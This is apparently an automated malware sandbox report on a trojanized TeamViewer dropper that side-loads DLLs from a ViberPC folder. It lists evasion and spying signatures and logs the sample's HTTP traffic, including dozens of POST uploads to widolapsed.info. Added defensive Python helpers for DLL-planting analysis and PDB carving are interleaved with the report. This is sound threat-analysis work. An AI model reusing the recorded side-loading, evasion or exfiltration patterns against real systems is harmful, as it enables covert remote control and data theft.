Windows Analysis Report wogZe27GBB

Overview

General Information

Sample Name: wogZe27GBB (renamed file extension from none to exe)
Analysis ID: 483790
MD5: 5efc68abd7fec415e34980d95a06a66a
SHA1: 34b243a0b3e322b8983b528caa5849395360a91d
SHA256: 0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
Tags: exeMappingOOOsigned

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 17
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
DLL side loading technique detected
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
EXE planting / hijacking vulnerabilities found
AV process strings found (often used to terminate AV products)
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: wogZe27GBB.exe ReversingLabs: Detection: 71%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll ReversingLabs: Detection: 51%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.wogZe27GBB.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen2

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0049B32E __EH_prolog3,CryptGenRandom, 4_2_0049B32E
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA, 4_2_0049B4A0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_006F605B CryptReleaseContext, 4_2_006F605B

Privilege Escalation:

EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\wogZe27GBB.exe EXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: msimg32.dll
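The EXE and DLL planting findings above all have the same root cause: UniPrint.exe (and the dropper itself) request DLLs by bare name while running out of a directory a standard user can write to, so the loader consults that directory before System32. The Python below is an added illustration, not code from the report or from Joe Sandbox. It walks the default Windows DLL search order over a constructed directory snapshot and labels each name: a KnownDLL cannot be planted at all; a name present in the application directory is side-loaded from there (TV.dll and Teamviewer_Resource_ja.dll, which the report shows dropped beside UniPrint.exe); a name that only exists in System32 is still plantable because the writable application directory is searched first; a name found nowhere is a phantom DLL, the "Tries to load missing DLLs" finding. The directory contents, the KnownDLLs subset, the current directory and the absence of SensApi.dll are assumptions made for the demonstration, not facts taken from the analysed system.

```python
"""Simulate the default (SafeDllSearchMode) DLL search order and flag planting.

Added example: the directory snapshot, the KnownDLLs subset and the
"missing" DLL are constructed for the demonstration, not read from the
analysed system.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

APP_DIR = r"C:\Users\user\AppData\Roaming\ViberPC\Icons"   # where the dropper put UniPrint.exe
CWD = r"C:\Users\user\Desktop"                              # assumed current directory

# Directories the loader consults, in order, when a DLL is requested by bare name
# and SafeDllSearchMode is on (the Windows default).
SEARCH_ORDER = [APP_DIR, r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows", CWD]

# Directories a standard user can write to; anything resolved after one of these
# could have been shadowed by dropping a file there.
USER_WRITABLE = {APP_DIR, CWD}

# KnownDLLs are mapped straight from System32 and never searched for. Assumed subset.
KNOWN_DLLS: Set[str] = {"kernel32.dll", "user32.dll", "advapi32.dll", "ole32.dll"}

# Constructed snapshot: lower-cased file names per directory.
FILESYSTEM: Dict[str, Set[str]] = {
    APP_DIR: {"uniprint.exe", "tv.dll", "teamviewer_resource_ja.dll"},
    r"C:\Windows\System32": {"kernel32.dll", "user32.dll", "advapi32.dll", "ole32.dll",
                              "winmm.dll", "bcrypt.dll", "version.dll", "wininet.dll",
                              "iphlpapi.dll", "cryptsp.dll", "wsock32.dll", "winsta.dll"},
    r"C:\Windows\System": set(),
    r"C:\Windows": set(),
    CWD: {"wogze27gbb.exe"},
    # SensApi.dll is deliberately absent from this snapshot to show the phantom-DLL case.
}


@dataclass
class Resolution:
    name: str
    resolved_from: Optional[str]          # directory the loader would take it from
    verdict: str                          # known-dll | sideloaded | plantable | system | phantom
    writable_dirs_searched_first: List[str] = field(default_factory=list)


def resolve_dll(name: str, search_order=SEARCH_ORDER, fs=FILESYSTEM,
                known=KNOWN_DLLS, writable=USER_WRITABLE) -> Resolution:
    """Return where `name` would load from and whether a user could have planted it."""
    key = name.lower()
    if key in known:
        return Resolution(name, r"C:\Windows\System32", "known-dll")
    writable_seen: List[str] = []
    for directory in search_order:
        if key in fs.get(directory, set()):
            if directory in writable:
                verdict = "sideloaded"         # loaded from a directory the user controls
            elif writable_seen:
                verdict = "plantable"          # a writable directory was searched before the real copy
            else:
                verdict = "system"
            return Resolution(name, directory, verdict, writable_seen)
        if directory in writable:
            writable_seen.append(directory)
    # Searched everywhere and found nothing: a phantom DLL. Dropping a file of
    # that name into any writable directory in the order gives code execution
    # inside the calling process.
    return Resolution(name, None, "phantom", writable_seen)


def audit(names: List[str]) -> Dict[str, Resolution]:
    return {n: resolve_dll(n) for n in names}


if __name__ == "__main__":
    for name, r in audit(["TV.dll", "Teamviewer_Resource_ja.dll", "WINMM.dll",
                          "bcrypt.dll", "kernel32.dll", "SensApi.dll"]).items():
        print(f"{name:28} {r.verdict:10} {r.resolved_from}")
```

The simulation covers bare-name loads only: a LoadLibrary call with a full path, LOAD_LIBRARY_SEARCH_* flags, SetDefaultDllDirectories, an application manifest or a real KnownDLLs list (HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs) all change the outcome on a live system, so treat the verdicts as candidates to confirm with Process Monitor rather than as proof.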

Compliance:

Uses 32bit PE files
Source: wogZe27GBB.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\wogZe27GBB.exe EXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: msimg32.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.3:49752 version: TLS 1.2
PE / OLE file has a valid certificate
Source: wogZe27GBB.exe Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp, svchost.exe, 0000000D.00000002.516408588.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.351085287.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355552090.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.373259727.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000002.381228039.000000007098C000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E61 FindFirstFileA,FindClose, 0_2_00405E61
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040263E FindFirstFileA, 0_2_0040263E
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_0040548B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 2_2_70982EF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 2_2_70982960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 4_2_70982960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 4_2_70982EF0
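The TeamViewer_qs.pdb and TV.pdb strings listed above come from the CodeView RSDS record in each module's debug directory, and the trailing "PS" and "<" on two of the hits are bytes after the NUL terminator that the memory-dump string scanner glued on. Carving the record itself yields the clean path plus the GUID and age that make up the symbol-server key, which is a more reliable pivot than the raw string. The Python below is an added illustration, not part of the report or of Joe Sandbox; the buffer it scans is constructed, with a made-up GUID, around the TeamViewer_qs.pdb path from the report, and build_rsds exists only to produce that input.

```python
"""Carve CodeView RSDS records (PDB path, GUID, age) out of an arbitrary byte buffer.

Added example. The buffer below is constructed: real record layout, made-up
GUID, PDB path taken from the report.
"""
import struct
import uuid
from dataclasses import dataclass
from typing import List

# CodeView RSDS record: b"RSDS" | GUID (16 bytes, Windows little-endian field
# layout) | age (uint32 LE) | NUL-terminated PDB path.
_RSDS_HEADER = struct.Struct("<4s16sI")


@dataclass
class PdbInfo:
    offset: int
    guid: str        # canonical 8-4-4-4-12 text
    age: int
    path: str
    symbol_key: str  # <GUID hex, upper, no dashes><age hex>: the symbol-server lookup key


def carve_rsds(buf: bytes, max_path: int = 512) -> List[PdbInfo]:
    """Return every well-formed RSDS record found in buf, in buffer order."""
    found: List[PdbInfo] = []
    pos = buf.find(b"RSDS")
    while pos != -1:
        end = pos + _RSDS_HEADER.size
        if end <= len(buf):
            _sig, guid_le, age = _RSDS_HEADER.unpack_from(buf, pos)
            nul = buf.find(b"\x00", end, end + max_path)
            # Require a terminator and a path ending in .pdb; this is what
            # separates a real record from a stray "RSDS" and keeps the
            # bytes after the terminator (the ".pdbPS" / ".pdb<" artefacts
            # of a plain string scan) out of the result.
            if nul != -1:
                try:
                    path = buf[end:nul].decode("ascii")
                except UnicodeDecodeError:
                    path = ""
                if path.lower().endswith(".pdb"):
                    guid = uuid.UUID(bytes_le=guid_le)
                    found.append(PdbInfo(pos, str(guid), age, path, f"{guid.hex.upper()}{age:X}"))
        pos = buf.find(b"RSDS", pos + 1)
    return found


def build_rsds(guid: uuid.UUID, age: int, path: str) -> bytes:
    """Serialise a record in the same layout (used here only to construct input)."""
    return _RSDS_HEADER.pack(b"RSDS", guid.bytes_le, age) + path.encode("ascii") + b"\x00"


# Constructed input: padding, a stray "RSDS" that is not a record, one real
# record carrying the report's TeamViewer_qs.pdb path under a made-up GUID,
# then the kind of trailing bytes a naive string scan would glue onto the path.
CONSTRUCTED_GUID = uuid.UUID("12345678-1234-5678-9abc-def012345678")
CONSTRUCTED_PATH = r"c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb"
SAMPLE_BUFFER = (b"\x00" * 32 + b"RSDS-not-a-record" +
                 build_rsds(CONSTRUCTED_GUID, 1, CONSTRUCTED_PATH) + b"PS\x00" + b"\xff" * 8)


if __name__ == "__main__":
    for rec in carve_rsds(SAMPLE_BUFFER):
        print(f"@{rec.offset:#x} age={rec.age} guid={rec.guid} key={rec.symbol_key}\n  {rec.path}")
```

On an intact PE you would locate the record through IMAGE_DEBUG_DIRECTORY (type 2, CODEVIEW) instead of scanning; the scan is the right tool for the .sdmp memory dumps the report cites, where headers may be missing. The GUID plus age is what a symbol server is asked for, so two builds that share a PDB path but differ in the key are different compilations.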

Networking:

Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: 44 POST requests to widolapsed.info. All share the request line and headers below; only Content-Length and the multipart boundary change from request to request:
POST /B8C631A8/ HTTP/1.1 | Content-Length: <n> | Content-Type: multipart/form-data; boundary=--------<boundary> | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: widolapsed.info | Connection: Close | Cache-Control: no-cache
Content-Length <n> / boundary <boundary>, in the order observed:
76431 / 3259937207
76426 / 974736809
81223 / 1733772180
81262 / 3571177622
81298 / 3135628383
83326 / 2112300367
83305 / 1747900146
83526 / 4043093276
81257 / 4228739266
81331 / 3803026718
81307 / 2963325791
85135 / 2571491142
82926 / 3335732562
83052 / 1291895716
76682 / 1315708494
76660 / 3047557173
76627 / 3142017803
76637 / 2197444700
76633 / 327613734
76617 / 3156620313
76640 / 2353964795
76644 / 2524520363
76647 / 776738021
76598 / 1255899435
76639 / 3577760510
76833 / 4017631281
76635 / 3576073818
76584 / 2060090614
76670 / 1263745405
76644 / 3327901999
76640 / 1002864139
76582 / 795614568
76736 / 572333967
76592 / 3756762824
76612 / 4010773262
76597 / 1730318477
76649 / 2667398164
76622 / 2156489369
76630 / 271647860
76597 / 2981659231
76646 / 3817058548
76655 / 1585944860
76672 / 1049848244
76598 / 3157952906
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master12.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ== HTTP/1.1 | Accept: */* | Content-Type: application/octet-stream | Content-Transfer-Encoding: binary | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master12.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082849&client=DynGate&p=10000002 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master12.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master12.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6sTY0saWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAABSAAApKaCYgAIAAAiAAABb76jy6JCEtP10hWwK5JgAShY7zj+R7R3DOU3+0YZJRajqI5wj4APqnpqJTTfow2rFHUX7lb5rKPxXbMNzymnW3afsLjONOJOSFwYGgTrjCxDXlTyXTROrLUrNxoJ5e0wRdRUaIY3bkkZHP/DCc/GC84acwVg91URMKSdn0IIfWg== HTTP/1.1 | Accept: */* | Content-Type: application/octet-stream | Content-Transfer-Encoding: binary | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master12.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082859&client=DynGate&p=10000002 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master12.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master12.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A== HTTP/1.1 | Accept: */* | Content-Type: application/octet-stream | Content-Transfer-Encoding: binary | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master12.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082864&client=DynGate&p=10000002 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master12.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master12.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJbKyuDC2NLsynpiTJjC3M7qws7KetTCTJjSxsrc5sqo8uDKemBMmpKIemDwysbMaMTEYszGanBsvmJucGBqbmBkbG5MnN6ezILG6NLsypbKyuDC2NLsynpgTKTq3OjS2sp6ckym6uDg3uToysiMysLo6uTK5npiTKiGoJ6qqHpgTKx6YmpcYFxscG5AoqQ== HTTP/1.1 | Accept: */* | Content-Type: application/octet-stream | Content-Transfer-Encoding: binary | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master12.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082873&client=DynGate&p=10000002 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master12.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: 188.172.198.151 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /dout.aspx?s=12418339&p=10000001&client=DynGate HTTP/1.1 | Accept: */* | Content-Type: application/octet-stream | Content-Transfer-Encoding: binary | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: 188.172.198.151 | Content-Length: 3 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /dout.aspx?s=12418339&p=10000002&client=DynGate HTTP/1.1 | Accept: */* | Content-Type: application/octet-stream | Content-Transfer-Encoding: binary | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: 188.172.198.151 | Content-Length: 500000 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=12418339&m=fast&client=DynGate&p=10000002 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: 188.172.198.151 | Connection: Keep-Alive | Cache-Control: no-cache
